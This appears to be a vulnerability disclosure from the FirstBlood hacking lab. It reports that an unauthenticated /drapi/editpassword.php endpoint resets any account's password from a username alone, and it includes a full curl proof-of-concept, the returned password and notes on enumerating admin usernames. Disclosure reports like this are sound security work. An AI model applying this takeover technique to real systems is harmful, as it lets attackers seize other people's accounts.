FirstBlood-#729 — Dangerous /drpanel/drapi/editpassword.php endpoint leading to 0 click account takeover
This issue was discovered on FirstBlood v2.0.0 (issues patched)
On 2021-10-27, neolex Level 2 reported:
username=neolexdata you can generate another password for any account.
step to reproduce
run the following command
curl -i -s -k -X $'POST' \ -H $'Host: 792406c141d1-neolex.a.firstbloodhackers.com' -H $'Sec-Ch-Ua: \"Chromium\";v=\"95\", \";Not A Brand\";v=\"99\"' -H $'Sec-Ch-Ua-Mobile: ?0' -H $'Sec-Ch-Ua-Platform: \"Linux\"' -H $'Upgrade-Insecure-Requests: 1' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' -H $'Sec-Fetch-Site: cross-site' -H $'Sec-Fetch-Mode: navigate' -H $'Sec-Fetch-Dest: iframe' -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: en-US,en;q=0.9' -H $'Connection: close' -H $'X-SITE-REQ: permitted' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 15' \ --data-binary $'username=neolex' \ $'https://792406c141d1-neolex.a.firstbloodhackers.com/drpanel/drapi/editpassword.php'
with replacing the username neolex by the account you want to takeover
the response will be something like :
Password updated - DAWI9RpJG7rVQZg
DAWI9RpJG7rVQZgis the new password of the account you choose
An attacker is able to trigger a 0 click account takeover and takeover any account
/drpanel/drapi/editpassword.php This bug makes use of the following vulnerabilities in a chain:
FirstBlood ID: 27
Vulnerability Type: Application/Business Logic
It is possible to edit the admins password (dradmin) from /drapi/editpassword as it's only looking for the username. Usernames can be enumerated when logging in as trying 'drAdmin' results in a different error. The username can also be found from FirstBlood v1.
FirstBlood ID: 28
Vulnerability Type: Auth issues
The endpoint /drapi/editpassword can actually be accessed unauthenticated.